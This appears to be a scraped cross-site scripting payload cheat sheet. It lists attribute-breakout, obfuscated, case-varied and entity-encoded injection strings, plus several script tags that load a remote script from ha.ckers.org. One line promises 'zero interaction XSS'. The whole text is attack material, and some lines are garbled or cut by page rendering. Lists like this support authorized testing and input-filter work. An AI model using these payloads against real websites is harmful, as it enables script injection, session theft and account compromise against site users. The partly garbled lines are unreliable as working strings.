" onfocus="alert(1)" name="bounty
(Append #bounty to the URL and enjoy your zero interaction XSS )
<svg/onload=location=javas+cript:ale+rt%2+81%2+9;//
Internet Explorer, Edge
Firefox
Common
'';!--"=&{()}
<SCRIPT SRC=
http://ha.ckers.org/xss.js></SCRIPT>
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=JaVaScRiPt:alert('XSS')>
<IMG SRC=javascript:alert("XSS")>
<IMG SRC=javascript:alert("RSnake says, 'XSS'")>
xxs link
xxs link
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
<IMG SRC= onmouseover="alert('xxs')">

<IMG SRC=javascript:alert(
'XSS')>
<IMG SRC=javascript:a&
#0000108ert('XSS')>
<SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT/SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<<SCRIPT>alert("XSS");//<</SCRIPT>
<SCRIPT SRC=
http://ha.ckers.org/xss.js?< B >
<SCRIPT SRC=//ha.ckers.org/.j>

<SCRIPT>alert("XSS");</SCRIPT>
![]()
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE>
- XSS